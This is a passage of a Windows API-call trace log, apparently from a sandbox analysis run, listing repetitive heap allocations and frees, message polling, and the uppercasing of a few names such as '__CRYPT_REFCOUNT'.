(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0212.656] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.656] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69c08 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0212.657] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0212.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0212.659] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0212.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0212.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0212.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0212.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c28 [0212.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c28 | out: hHeap=0x970000) returned 1 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0212.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0212.660] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.660] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.660] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0212.661] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977998 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0212.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0212.661] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f2a298 [0212.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0212.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0212.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0212.661] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0212.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1898) returned 0x2f2bb38 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2a298 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0212.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0212.662] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0212.662] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0212.662] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0212.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.663] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0212.663] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0212.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0212.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0212.663] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0212.663] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0212.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0212.663] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0212.663] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0212.663] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0212.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0212.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0212.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0212.664] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0212.664] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0212.665] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0212.665] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0212.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0212.665] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0212.665] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0212.665] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0212.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0212.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0212.666] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0212.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0212.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0212.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0212.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0212.666] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a88 [0212.666] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0212.666] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0212.666] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0212.666] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0212.667] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 